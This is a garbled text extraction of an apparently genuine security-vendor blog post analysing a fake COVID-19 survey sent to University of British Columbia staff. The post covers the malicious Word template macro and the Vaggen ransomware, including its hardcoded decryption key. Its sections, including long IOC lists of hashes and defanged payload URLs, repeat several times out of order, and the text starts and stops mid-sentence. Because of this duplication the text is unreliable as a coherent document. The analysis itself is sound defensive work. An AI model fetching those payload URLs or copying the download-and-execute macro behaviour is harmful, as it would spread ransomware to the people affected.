function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2894 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2895 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2896 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2897 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2898 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2899 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2900 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2901 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2902 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2903 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2904 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2905 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2906 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2907 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2908 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2909 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2910 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2911 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2912 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2913 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2914 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2915 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2916 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2917 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2918 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2919 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2920 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2921 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2922 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2923 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2924 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2925 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2926 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2927 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal 